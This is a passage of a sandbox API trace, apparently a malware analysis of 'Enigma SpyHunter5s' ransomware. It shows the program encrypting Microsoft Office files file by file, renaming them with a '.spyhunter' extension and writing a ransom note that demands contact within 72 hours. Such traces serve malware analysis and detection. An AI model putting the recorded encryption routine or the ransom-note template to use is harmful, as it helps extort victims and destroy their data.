hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0102.558] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.558] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfb6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb2c, lpOverlapped=0x0 | out: lpBuffer=0x25cfb6c*, lpNumberOfBytesWritten=0x25cfb2c*=0x4, lpOverlapped=0x0) returned 1 [0102.558] WriteFile (in: hFile=0x16c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb2c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb2c*=0x30, lpOverlapped=0x0) returned 1 [0102.558] CloseHandle (hObject=0x16c) returned 1 [0102.708] GetProcessHeap () returned 0x2c0000 [0102.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0102.708] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15185_.GIF.spyhunter") returned 81 [0102.708] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15185_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15185_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15185_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15185_.gif.spyhunter")) returned 1 [0102.709] GetProcessHeap () returned 0x2c0000 [0102.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0102.709] GetProcessHeap () returned 0x2c0000 [0102.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0102.709] GetProcessHeap () returned 0x2c0000 [0102.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c18558 | out: hHeap=0x2c0000) returned 1 [0102.709] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb68 | out: pbBuffer=0x25cfb68) returned 1 [0102.709] GetProcessHeap () returned 0x2c0000 [0102.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0102.709] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb60*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb60*=0x30) returned 1 [0102.710] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0103.360] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 65 [0103.360] StrStrW (lpFirst="OIS_K_COL.HXK", lpSrch=".txt") returned 0x0 [0103.360] GetProcessHeap () returned 0x2c0000 [0103.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0103.360] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cfb24*=0x71, lpOverlapped=0x0) returned 1 [0103.361] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff8f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.361] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x71, lpNumberOfBytesWritten=0x25cfb24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cfb24*=0x71, lpOverlapped=0x0) returned 1 [0103.362] GetProcessHeap () returned 0x2c0000 [0103.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0103.362] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.362] WriteFile (in: hFile=0x170, lpBuffer=0x25cfb64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb24, lpOverlapped=0x0 | out: lpBuffer=0x25cfb64*, lpNumberOfBytesWritten=0x25cfb24*=0x4, lpOverlapped=0x0) returned 1 [0103.362] WriteFile (in: hFile=0x170, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb24, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb24*=0x30, lpOverlapped=0x0) returned 1 [0103.362] CloseHandle (hObject=0x170) returned 1 [0103.362] GetProcessHeap () returned 0x2c0000 [0103.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0103.363] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK.spyhunter") returned 75 [0103.363] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_k_col.hxk"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_k_col.hxk.spyhunter")) returned 1 [0103.363] GetProcessHeap () returned 0x2c0000 [0103.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0103.364] GetProcessHeap () returned 0x2c0000 [0103.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0103.364] GetProcessHeap () returned 0x2c0000 [0103.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ca7d28 | out: hHeap=0x2c0000) returned 1 [0103.364] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb68 | out: pbBuffer=0x25cfb68) returned 1 [0103.364] GetProcessHeap () returned 0x2c0000 [0103.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0103.364] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb60*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb60*=0x30) returned 1 [0103.364] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.rest.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0103.365] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL") returned 73 [0103.365] StrStrW (lpFirst="PUB6INTL.REST.IDX_DLL", lpSrch=".txt") returned 0x0 [0103.365] GetProcessHeap () returned 0x2c0000 [0103.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0103.365] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cfb24*=0x2800, lpOverlapped=0x0) returned 1 [0103.367] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.367] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfb24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cfb24*=0x2800, lpOverlapped=0x0) returned 1 [0103.368] GetProcessHeap () returned 0x2c0000 [0103.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0103.368] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.368] WriteFile (in: hFile=0x170, lpBuffer=0x25cfb64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb24, lpOverlapped=0x0 | out: lpBuffer=0x25cfb64*, lpNumberOfBytesWritten=0x25cfb24*=0x4, lpOverlapped=0x0) returned 1 [0103.369] WriteFile (in: hFile=0x170, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb24, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb24*=0x30, lpOverlapped=0x0) returned 1 [0103.369] CloseHandle (hObject=0x170) returned 1 [0103.370] GetProcessHeap () returned 0x2c0000 [0103.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0103.370] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL.spyhunter") returned 83 [0103.370] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.rest.idx_dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.REST.IDX_DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.rest.idx_dll.spyhunter")) returned 1 [0103.370] GetProcessHeap () returned 0x2c0000 [0103.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0103.371] GetProcessHeap () returned 0x2c0000 [0103.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0103.371] GetProcessHeap () returned 0x2c0000 [0103.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33bce0 | out: hHeap=0x2c0000) returned 1 [0103.371] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb60 | out: pbBuffer=0x25cfb60) returned 1 [0103.371] GetProcessHeap () returned 0x2c0000 [0103.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0103.371] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb58*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb58*=0x30) returned 1 [0103.371] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0103.372] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL") returned 72 [0103.372] StrStrW (lpFirst="PUB6INTL.DLL.IDX_DLL", lpSrch=".txt") returned 0x0 [0103.372] GetProcessHeap () returned 0x2c0000 [0103.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0103.372] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cfb1c*=0x2800, lpOverlapped=0x0) returned 1 [0103.384] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.384] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfb1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cfb1c*=0x2800, lpOverlapped=0x0) returned 1 [0103.385] GetProcessHeap () returned 0x2c0000 [0103.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0103.385] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.385] WriteFile (in: hFile=0x170, lpBuffer=0x25cfb5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb1c, lpOverlapped=0x0 | out: lpBuffer=0x25cfb5c*, lpNumberOfBytesWritten=0x25cfb1c*=0x4, lpOverlapped=0x0) returned 1 [0103.393] WriteFile (in: hFile=0x170, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb1c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb1c*=0x30, lpOverlapped=0x0) returned 1 [0103.394] CloseHandle (hObject=0x170) returned 1 [0103.394] GetProcessHeap () returned 0x2c0000 [0103.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0103.394] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL.spyhunter") returned 82 [0103.394] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.dll.idx_dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUB6INTL.DLL.IDX_DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pub6intl.dll.idx_dll.spyhunter")) returned 1 [0103.395] GetProcessHeap () returned 0x2c0000 [0103.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0103.395] GetProcessHeap () returned 0x2c0000 [0103.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0103.395] GetProcessHeap () returned 0x2c0000 [0103.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33bc00 | out: hHeap=0x2c0000) returned 1 [0103.396] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb60 | out: pbBuffer=0x25cfb60) returned 1 [0103.396] GetProcessHeap () returned 0x2c0000 [0103.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0103.396] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb58*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb58*=0x30) returned 1 [0103.396] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHSRN.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\psrchsrn.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0103.405] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHSRN.DAT") returned 64 [0103.405] StrStrW (lpFirst="PSRCHSRN.DAT", lpSrch=".txt") returned 0x0 [0103.405] GetProcessHeap () returned 0x2c0000 [0103.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0103.406] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cfb1c*=0x2800, lpOverlapped=0x0) returned 1 [0103.421] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.421] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfb1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cfb1c*=0x2800, lpOverlapped=0x0) returned 1 [0103.421] GetProcessHeap () returned 0x2c0000 [0103.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0103.421] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.421] WriteFile (in: hFile=0x170, lpBuffer=0x25cfb5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb1c, lpOverlapped=0x0 | out: lpBuffer=0x25cfb5c*, lpNumberOfBytesWritten=0x25cfb1c*=0x4, lpOverlapped=0x0) returned 1 [0103.755] WriteFile (in: hFile=0x170, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb1c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb1c*=0x30, lpOverlapped=0x0) returned 1 [0103.755] CloseHandle (hObject=0x170) returned 1 [0103.755] GetProcessHeap () returned 0x2c0000 [0103.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0103.755] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHSRN.DAT.spyhunter") returned 74 [0103.755] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHSRN.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\psrchsrn.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHSRN.DAT.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\psrchsrn.dat.spyhunter")) returned 1 [0103.756] GetProcessHeap () returned 0x2c0000 [0103.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0103.756] GetProcessHeap () returned 0x2c0000 [0103.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0103.756] GetProcessHeap () returned 0x2c0000 [0103.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ca8fd8 | out: hHeap=0x2c0000) returned 1 [0103.756] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb58 | out: pbBuffer=0x25cfb58) returned 1 [0103.756] GetProcessHeap () returned 0x2c0000 [0103.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0103.757] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb50*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb50*=0x30) returned 1 [0103.757] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHKEY.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\psrchkey.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0103.757] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHKEY.DAT") returned 64 [0103.757] StrStrW (lpFirst="PSRCHKEY.DAT", lpSrch=".txt") returned 0x0 [0103.757] GetProcessHeap () returned 0x2c0000 [0103.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0103.757] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb14, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cfb14*=0x2800, lpOverlapped=0x0) returned 1 [0104.146] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.146] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfb14, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cfb14*=0x2800, lpOverlapped=0x0) returned 1 [0104.147] GetProcessHeap () returned 0x2c0000 [0104.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0104.147] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.147] WriteFile (in: hFile=0x170, lpBuffer=0x25cfb54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb14, lpOverlapped=0x0 | out: lpBuffer=0x25cfb54*, lpNumberOfBytesWritten=0x25cfb14*=0x4, lpOverlapped=0x0) returned 1 [0104.149] WriteFile (in: hFile=0x170, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb14, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb14*=0x30, lpOverlapped=0x0) returned 1 [0104.150] CloseHandle (hObject=0x170) returned 1 [0104.150] GetProcessHeap () returned 0x2c0000 [0104.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0104.150] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHKEY.DAT.spyhunter") returned 74 [0104.150] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHKEY.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\psrchkey.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHKEY.DAT.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\psrchkey.dat.spyhunter")) returned 1 [0104.168] GetProcessHeap () returned 0x2c0000 [0104.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0104.169] GetProcessHeap () returned 0x2c0000 [0104.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0104.169] GetProcessHeap () returned 0x2c0000 [0104.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ca8c98 | out: hHeap=0x2c0000) returned 1 [0104.169] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0104.170] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0104.170] WriteFile (in: hFile=0x170, lpBuffer=0x25cfa8b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfbb4, lpOverlapped=0x0 | out: lpBuffer=0x25cfa8b*, lpNumberOfBytesWritten=0x25cfbb4*=0x127, lpOverlapped=0x0) returned 1 [0104.171] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0104.171] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfbb4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfbb4*=0x2ac, lpOverlapped=0x0) returned 1 [0104.171] CloseHandle (hObject=0x170) returned 1 [0104.171] GetProcessHeap () returned 0x2c0000 [0104.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c9c9a8 | out: hHeap=0x2c0000) returned 1 [0104.171] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb50 | out: pbBuffer=0x25cfb50) returned 1 [0104.171] GetProcessHeap () returned 0x2c0000 [0104.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0104.171] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb48*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb48*=0x30) returned 1 [0104.171] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\XMLSDK5.CHM" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xmlsdk5.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0104.174] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\XMLSDK5.CHM") returned 63 [0104.174] StrStrW (lpFirst="XMLSDK5.CHM", lpSrch=".txt") returned 0x0 [0104.174] GetProcessHeap () returned 0x2c0000 [0104.174] 